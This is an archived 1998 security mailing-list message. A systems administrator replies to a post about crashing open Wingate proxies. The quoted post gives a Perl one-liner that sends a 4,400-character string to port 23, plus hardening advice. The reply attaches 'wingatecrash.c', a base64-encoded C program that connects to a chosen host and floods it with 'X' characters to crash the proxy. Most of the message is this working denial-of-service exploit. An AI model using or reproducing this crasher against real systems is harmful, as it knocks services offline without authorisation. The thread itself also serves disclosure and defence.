This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---559023410-758783491-911091133=:3068 Content-Type: TEXT/PLAIN; charset=US-ASCII Well, here is my C version of your script =). It takes the host and optional port as arguments. Compiled and ran on several slackware-linux/x86 boxes. Just more proof that wingate is way too insecure to leave an opening to the outside. -- Eric Wanner Head Systems Administrator FutureOne, Inc. 602-385-3379 http://home.futureone.com On Sat, 14 Nov 1998, G23 wrote: > Hello, > > The following one-liner will crash an open Wingate. > > perl -MIO::Socket -e \ > 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\ > ->send("X" x 4400 . "\n",0)' > > Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable. The above is my rendition of a 44 line sh script written by "rEWTED" (kefkaat_private). > > Anyone configuring a proxy for LAN use should only bind to an internal > interface anyway. (IE, kidz shouldn't even see your proxy) > http://wingate.net/helppages/wingate2Securing_your_network.html > > If you do provide telnet proxy for the world, then at least log. > http://wingate.net/helppages/wingate2Auditing_and_Logging.html > > ghost23 > > > > ____________________________________________________________________ > Get free e-mail and a permanent address at http://www.netaddress.com/?N=1 > ---559023410-758783491-911091133=:3068 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="wingatecrash.c" Content-ID: <Pine.GSO.3.96.981114175213.3068Cat_private> Content-Description: Content-Transfer-Encoding: BASE64 LyogQmxhaCwgYmxhaCwgYmxhaCwgSSBhbSBub3QgbGlhYmxlIGZvciBhbnl0 aGluZyB0aGlzIHByb2dyYW0NCiAgIGRvZXMsIG9yIHdoYXQgYW55b25lIGRv ZXMgd2l0aCBpdC4gIFRISVMgUFJPR1JBTSBDT01FUyBXSVRIDQogICBOTyBX QVJSQU5UWSwgQU5EIFRIRSBBVVRIT1IgSVMgSU4gTk8gRVZFTlQgTElBQkxF IEZPUiBBTllUSElORw0KICAgVEhBVCBIQVBQRU5TIFdJVEggSVQsIElOQ0xV RElORyBJRiBJVCBTQ1JFV1MgWU9VUiBTWVNURU0sIE9SDQogICBTT01FT05F IFVTRVMgSVQgVE8gU0NSRVcgWU9VUiBTWVNURU0sIE9SIFlPVSBHRVQgSU4g VFJPVUJMRQ0KICAgRk9SIFNDUkVXSU5HIFNPTUVPTkUnUyBTWVNURU0uICBU aGlzIHByb2dyYW0gaXMgZm9yIGF1ZGl0aW5nDQogICB5b3VyIG93biBzeXN0 ZW0gb25seSwgbm90IGZvciBEb1MgYXR0YWNrcy4gSSBhbSBub3QgbGlhYmxl DQogICBmb3IgYW55dGhpbmcgeW91IG9yIGFueW9uZSBlbHNlIGRvZXMgd2l0 aCB0aGlzIHByb2dyYW0uICBUaGlzDQogICBwcm9ncmFtIGlzIGZvciBhdWRp dGluZyBhbmQgaW5mb3JtYXRpb25hbCBwdXJwb3NlcyBvbmx5IQ0KKi8NCi8q IEZlZWwgZnJlZSB0byBtb2RpZnkgdGhpcyBzaGl0LCBidXQgZ2l2ZSBtZSBj cmVkaXQuDQoNCiAgIDExLzE0LzE5OTggaG9sb2J5dGUNCiAgIGhvbG9ieXRl QGhvbG9ieXRlLm9yZw0KKi8NCi8qIEJhc2VkIG9uIHRoZSBidWd0cmFxIHJl bGVhc2UgYnkgZzIzQHVzYS5uZXQgKi8NCiNpbmNsdWRlIDxzeXMvdHlwZXMu aD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8c3RkaW8u aD4NCiNpbmNsdWRlIDxuZXRkYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0K I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCg0KbWFpbiAoaW50IGFyZ2MsIGNo YXIgKmFyZ3ZbXSkgew0KCWludCBzb2NrZmQ7DQoJc3RydWN0IHNvY2thZGRy X2luIHN0YWRkcjsNCglpbnQgcG9ydDsNCglzdHJ1Y3QgaG9zdGVudCAqdG1w X2hvc3Q7DQoJdW5zaWduZWQgbG9uZyBpbnQgYWRkcjsNCglpbnQgY29ubmZk Ow0KCWludCBpOw0KDQoJcHJpbnRmKCJXaW5nYXRlIGNyYXNoZXIgYnkgaG9s b2J5dGUgPGhvbG9ieXRlQGhvbG9ieXRlLm9yZz5cblxuIik7DQoJaWYgKGFy Z2MgIT0gMiAmJiBhcmdjICE9IDMpIHsgcHJpbnRmKCJVc2FnZTogJXMgPHdp bmdhdGU+IFtwb3J0KGRlZnVhbHQ9MjMpXVxuIixhcmd2WzBdKTsgZXhpdCgx KTsgfQ0KCWlmIChhcmdjID09IDIpIHsgcG9ydD0yMzsgfSBlbHNlIHsgcG9y dD1hdG9pKGFyZ3ZbMl0pOyB9DQoJaWYgKCEocG9ydCA+IDAgJiYgcG9ydCA8 IDY1NTM2KSkgeyBwcmludGYoIkludmFsaWQgcG9ydFxuIik7IGV4aXQoMik7 IH0NCgkvKiBJZiB0aGlzIHJldHVybnMgLTEgd2UnbGwgdHJ5IHRvIGxvb2sg aXQgdXAuICBJIGRvbid0IGFzc3VtZSBhbnlvbmUgd2lsbCBiZSBwdXR0aW5n DQoJaW4gMjU1LjI1NS4yNTUuMjU1LCBzbyBJJ2xsIGdvIHdpdGggaW5ldF9h ZGRyKCkgKi8NCgliemVybygmc3RhZGRyLHNpemVvZihzdGFkZHIpKTsNCglp ZiAoKHN0YWRkci5zaW5fYWRkci5zX2FkZHIgPSBpbmV0X2FkZHIoYXJndlsx XSkpID09IC0xKSB7DQoJCXRtcF9ob3N0ID0gZ2V0aG9zdGJ5bmFtZShhcmd2 WzFdKTsNCgkJaWYgKHRtcF9ob3N0ID09IE5VTEwpIHsgcHJpbnRmKCJDb3Vs ZCBub3QgZ2V0IHZhbGlkIGFkZHIgaW5mbyBvbiAlczogdG1wX2hvc3RcbiIs YXJndlsxXSk7IGV4aXQoNyk7fSBlbHNlIHsNCgkJCW1lbWNweSgoY2FkZHJf dCAqKSZzdGFkZHIuc2luX2FkZHIuc19hZGRyLHRtcF9ob3N0LT5oX2FkZHIs dG1wX2hvc3QtPmhfbGVuZ3RoKTsNCgkJCWlmIChzdGFkZHIuc2luX2FkZHIu c19hZGRyID09IC0xKSB7IHByaW50ZigiQ291bGQgbm90IHZhbGlkIGFkZHIg aW5mbyBvbiAlczogYWRkciAtMVxuIixhcmd2WzFdKTsgZXhpdCg4KTsgfQ0K CQl9DQoJfQ0KCWlmICgoc29ja2ZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tf U1RSRUFNLCAwKSkgPCAwKSB7IHBlcnJvcigiU29ja2V0Iik7IGV4aXQoMyk7 IH0NCglzdGFkZHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc3RhZGRyLnNp bl9wb3J0ID0gaHRvbnMocG9ydCk7DQoJaWYgKGNvbm5lY3Qoc29ja2ZkLCAo c3RydWN0IHNvY2thZGRyICopICZzdGFkZHIsIHNpemVvZihzdGFkZHIpKSA8 IDApIHsgcGVycm9yKCJDb25uZWN0Iik7IGV4aXQoNCk7IH0NCglwcmludGYo IkNvbm5lY3RlZC4uLiBDcmFzaGluZyIpOw0KCWZvciAoaT0wO2k8MTAwO2kr Kykgew0KCQlpZiAoKHdyaXRlKHNvY2tmZCwiWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgiLDQ0KSkgPCAwKSB7IHBlcnJv cigiV3JpdGUiKTsgZXhpdCg1KTsgfQ0KCQlwdXRjKCcuJyxzdGRvdXQpOw0K CQlmZmx1c2goc3Rkb3V0KTsNCgl9DQoJaWYgKHdyaXRlKHNvY2tmZCwiXG4i LDEpIDwgMCkgeyBwZXJyb3IoIkZpbmFsIFdyaXRlIik7IGV4aXQoNik7IH0N CglwdXRjKCdcbicsc3Rkb3V0KTsNCglmZmx1c2goc3Rkb3V0KTsNCgljbG9z ZShzb2NrZmQpOw0KfQ0K ---559023410-758783491-911091133=:3068--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:27 PDT